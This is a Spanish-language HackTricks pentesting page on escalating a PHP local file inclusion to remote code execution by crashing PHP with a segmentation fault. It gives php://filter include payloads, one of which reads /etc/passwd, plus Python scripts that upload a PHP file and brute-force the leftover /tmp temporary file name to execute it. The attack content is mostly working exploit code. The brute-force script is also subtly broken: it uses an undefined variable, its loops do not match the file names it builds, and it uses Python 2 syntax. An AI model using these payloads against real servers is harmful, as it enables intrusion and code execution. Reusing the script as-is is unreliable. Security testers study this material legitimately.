hacktricks/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

5.6 KiB

LFI2RCE a través de Segmentation Fault

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Según los informes https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (segunda parte) y https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, las siguientes cargas útiles causaron una violación de segmentación en PHP:

// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Debes saber que si envías una solicitud POST que contiene un archivo, PHP creará un archivo temporal en /tmp/php<algo> con el contenido de ese archivo. Este archivo se eliminará automáticamente una vez que se procese la solicitud.

Si encuentras una LFI y logras provocar una falla de segmentación en PHP, el archivo temporal nunca se eliminará. Por lo tanto, puedes buscarlo con la vulnerabilidad de LFI hasta que lo encuentres y ejecutar código arbitrario.

Puedes usar la imagen de Docker https://hub.docker.com/r/easyengine/php7.0 para realizar pruebas.

# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import requests
import string
import threading

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
    for i in charset:
        for j in charset:
            for k in charset:
                for l in charset:
                    for m in charset:
                        for n in charset:
                            filename = prefix + i + j + k
                            url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
                            print url
                            response = requests.get(url)
                            if 'spyd3r' in response.content:
                                print "[+] Include success!"
                                return True


def main():
    bruteforce(charset)

if __name__ == "__main__":
    main()
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥